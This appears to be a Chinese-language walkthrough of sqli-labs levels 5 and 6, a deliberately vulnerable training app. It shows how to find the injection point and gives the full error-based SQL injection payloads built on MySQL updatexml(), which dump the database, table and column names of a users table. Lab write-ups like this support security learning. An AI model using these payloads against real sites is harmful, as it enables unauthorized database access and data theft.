当前位置: 首页 > news >正文

sqli-labs 靶场 less-5、6 第五关和第六关:判断注入点、使用错误函数注入爆库名、updatexml()函数

SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。

database pic

Less 5

SQLI DUMB SERIES-5
判断注入点:1. 首先,尝试正常的回显内容,如?id=1。2. 接着,输入?id=1'来查看是否出现语句错误。如果出现,那么可能存在单引号的闭合问题。
判断当前表的字段数:使用order by语句来判断当前表的字段数。例如,?id=1' order by 3--和?id=1' order by 4--,通过页面回显的结果来确定字段数。
使用错误函数注入爆库名:1. 既然没有直接的回显信息,您可以使用MySQL的updatexml()函数来触发错误并提取信息。updatexml()函数在第二个参数包含特殊符号时会报错,并将第二个参数的内容显示在报错信息中。2. 尝试使用类似?id=1' and updatexml(1, concat(0x7e, version()), 3)--的语句来提取数据库版本信息。3. 逐步构造更复杂的语句来提取其他信息,如数据库名、表名等。

判断注入点

通过测试可知使用单引号会使得系统报语法报错

http://sqli-labs.com/Less-5/
?id=1'

ur SQL syntax; check the manual that corresponds to your MySQL server version f
即使使用注释语句重新获取数据页面中也不回显数据。
u are in......
意味着只有报错的时候才会在页面显示数据,那么我们通过使用报错注释函数获取数据。
updatexml

updatexml()是一个使用不同的xml标记匹配和替换xml块的函数。
语法:updatexml(XML_document,XPath_string,new_value)
XML_document:是string格式,为XML文档对象的名称
XPath_string:代表路径,Xpath格式的字符串例如
new_value:string格式,替换查找到的符合条件的数据
updatexml使用时,当xpath_string格式出现错误,mysql则会爆出xpath语法错误(xpath syntax)

注入

通过报错注入代码,查看数据库名称:

http://sqli-labs.com/Less-5/
?id=1' union select 1,2,updatexml(1,concat("~",database()),3) --+

XPATH syntax erro
获取该数据库的表名:

http://sqli-labs.com/Less-5/
?id=1' union select 1,2,updatexml(1,concat("~",
(select group_concat(table_name) from information_schema.tables where table_schema='security')
),3) --+

ls,referers,u
注入查询users表的列名:

http://sqli-labs.com/Less-5/
?id=1' union select 1,2,updatexml(1,concat("~",
(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')
),3) --+

sername,p

Less 6

SQLI DUMB SERIES-5
判断注入点:同第五关。
判断当前表的字段数:同第五关。
使用错误函数注入提取信息:同第五关。

判断注入点

输入双引号后报错的响应可知为闭合符号:

http://sqli-labs.com/Less-6/
?id=1" 

sqli dump
继续判断字段数量,当数字为3时没报错,得知为3个字段。

http://sqli-labs.com/Less-6/
?id=1" order by 3 --+

e    Dhak

注入

输入正确不返回数据,则我们通过错误函数注入获取数据库。

http://sqli-labs.com/Less-6/
?id=1" union select updatexml(1,concat('~',database()),3); --+

sqli dumb
在错误函数注入中输入语句,用于获取该数据库表名

http://sqli-labs.com/Less-6/
?id=1" union select 1,2,updatexml(1,concat('~',
(select group_concat(table_name) from information_schema.tables where table_schema=database())
),3); --+

_concat(table_na
注入获取数据表列名。

http://sqli-labs.com/Less-6/
?id=1" union select 1,2,updatexml(1,concat('~',
(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')
),3); --+

tabase()

系列文章

  • sqli-labs 靶场 less-1、2、3、4第一关至第四关
  • sqli-labs 靶场 less-5、6 第五关和第六关
http://www.lryc.cn/news/365599.html

相关文章:

  • WebSocket详解与封装工具类
  • Linux学习, 进程和线程
  • SVM模型实现城镇居民月平均消费数据分类
  • [ZJCTF 2019]NiZhuanSiWei、[HUBUCTF 2022 新生赛]checkin、[SWPUCTF 2021 新生赛]pop
  • c++“二纯” 纯虚函数和纯虚析构
  • MATLAB基础应用精讲-【数模应用】二元Logit分析(最终篇)(附python、MATLAB和R语言代码实现)
  • centos7安装mysql(完整)
  • C++ STL std::vector的实现机制【面试】
  • 激活函数对比
  • pycharm 上一次编辑位置不见了
  • FFmpeg播放器的相关概念【1】
  • =与==的优先级
  • 在Linux上的Java项目导出PDF乱码问题
  • java:使用shardingSphere访问mysql的分库分表数据
  • 红酒:如何选择适合的红酒储存容器
  • 【C++】 使用CRT 库检测内存泄漏
  • python手动搭建transformer,并实现自回归推理
  • AI数据分析:用deepseek进行贡献度分析(帕累托法则)
  • 生成式人工智能的风险与治理——以ChatGPT为例
  • 十足正式在山东开疆拓土!首批店7月初开业,地区便利店现全新面貌!
  • Unity2D游戏开发-玩家控制
  • 如何在 Windows 11 上免费恢复永久删除的文件
  • Spring boot 集成mybatis-plus
  • 数据仓库之缓慢变化维
  • 跑mask2former(自用)
  • Linux日志服务rsyslog深度解析(上)
  • python的df.describe()函数
  • Feign的介绍与说明
  • 【Linux】用户和组的管理、综合实训
  • B=2W,奈奎斯特极限定理详解